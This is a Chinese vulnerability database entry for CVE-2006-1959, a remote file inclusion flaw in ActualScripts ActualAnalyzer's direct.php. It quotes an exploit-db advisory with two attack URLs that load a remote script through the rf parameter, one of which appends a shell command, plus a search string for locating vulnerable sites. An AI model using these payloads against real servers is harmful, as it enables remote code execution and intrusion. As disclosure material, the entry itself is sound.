ActualScripts ActualAnalyzer Direct.PHP 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110239 漏洞类型 输入验证
发布时间 2006-05-08 更新时间 2006-05-08
CVE编号 CVE-2006-1959 CNNVD-ID CNNVD-200604-398
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1767
https://cxsecurity.com/issue/WLB-2006040069
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-398
|漏洞详情
ActualScriptsActualAnalyzerLite2.72及早期版本、Gold7.63及早期版本以及Server8.23及早期版本中的direct.php存在PHP远程文件包含漏洞。这使得远程攻击者可以借助于rf参数中的URL执行任意代码。
|漏洞EXP
Title: ActualAnalyzer Server <=8.23 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: ActualScripts
URL: http://actualscripts.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "ActualScripts, Company. All rights reserved."
-----------------------------------------------------------------

Exploitation:

/direct.php?rf=http://www.yourspace.com/yourscript.php?
/direct.php?rf=http://www.yourspace.com/yourscript.txt?&ls%20-laF

# milw0rm.com [2006-05-08]
|参考资料

来源:BID
名称:17597
链接:http://www.securityfocus.com/bid/17597
来源:BUGTRAQ
名称:20060419[MajorSecurity]ActualAnalyzer-RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/431351/100/0/threaded
来源:VUPEN
名称:ADV-2006-1430
链接:http://www.frsirt.com/english/advisories/2006/1430
来源:SECUNIA
名称:19743
链接:http://secunia.com/advisories/19743
来源:XF
名称:actualanalyzer-direct-file-include(25893)
链接:http://xforce.iss.net/xforce/xfdb/25893
来源:BUGTRAQ
名称:20060520ActualAnalyzerServer<=8.23-RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/434562/100/0/threaded
来源:OSVDB
名称:24778
链接:http://www.osvdb.org/24778
来源:SECTRACK
名称:1015967
链接:http://securitytracker.com/id?1015967
来源:SREASON
名称:742
链接:http://securityreason.com/securityalert/742